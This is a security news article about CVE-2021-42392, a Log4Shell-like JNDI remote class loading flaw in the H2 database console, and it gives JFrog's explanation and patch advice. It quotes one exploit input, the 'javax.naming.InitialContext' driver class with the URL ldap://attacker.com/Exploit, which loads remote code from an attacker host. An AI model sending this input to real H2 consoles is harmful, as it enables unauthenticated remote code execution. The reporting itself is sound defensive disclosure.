- IT 리더가 지목한 AI 가치 실현의 최대 걸림돌은 ‘비용 관리’
- Los CIO consideran que la gestión de costes puede acabar con el valor de la IA
- 칼럼 | AI 에이전트, 지금까지의 어떤 기술과도 다르다
- The $23 Echo Dot deal is a great deal to upgrade your smart home this Black Friday
- Amazon's Echo Spot smart alarm clock is almost half off this Black Friday
Researchers Warn of New Log4Shell-Like Java Vulnerability
Security researchers are warning of a critical new Java bug with the same root cause as the notorious Log4Shell vulnerability currently being exploited around the globe.
CVE-2021-42392 has yet to be officially published in the National Vulnerability Database (NVD), but according to JFrog, it impacts the console of the popular H2 Java SQL database.
The security firm urged any organization currently running an H2 console exposed to their LAN or WAN to update the database immediately to version 2.0.206 or risk attackers exploiting it for unauthenticated remote code execution (RCE).
Like Log4Shell, the bug relates to JNDI (Java Naming and Directory Interface) “remote class loading.” JNDI is an API that provides naming and directory functionality for Java apps. It means that if an attacker can get a malicious URL into a JNDI lookup, it could enable RCE.
“In a nutshell, the root cause is similar to Log4Shell – several code paths in the H2 database framework pass unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function, which allows for remote codebase loading (AKA Java code injection AKA remote code execution),” JFrog explained.
“Specifically, the org.h2.util.JdbcUtils.getConnection method takes a driver class name and database URL as parameters. If the driver’s class is assignable to the javax.naming.Context class, the method instantiates an object from it and calls its lookup method.”
It added that supplying a driver class such as “javax.naming.InitialContext” and a URL as simple as ldap://attacker.com/Exploit will lead to remote code execution.
JFrog said the vulnerability is particularly dangerous as the H2 database package is particularly popular. It’s one of the top 50 most popular Maven packages, with almost 7000 artifact dependencies, the firm claimed.
However, there are some reasons why exploitation won’t be as widespread as Log4Shell. For one, it has a “direct scope of impact,” meaning vulnerable servers should be easier to find.
Second, in most H2 distributions, the console only listens to localhost connections, meaning the default setting is not exploitable.
“Many vendors may be running the H2 database, but not running the H2 console,” JFrog added. “Although there are other vectors to exploit this issue other than the console, these other vectors are context-dependent and less likely to be exposed to remote attackers.”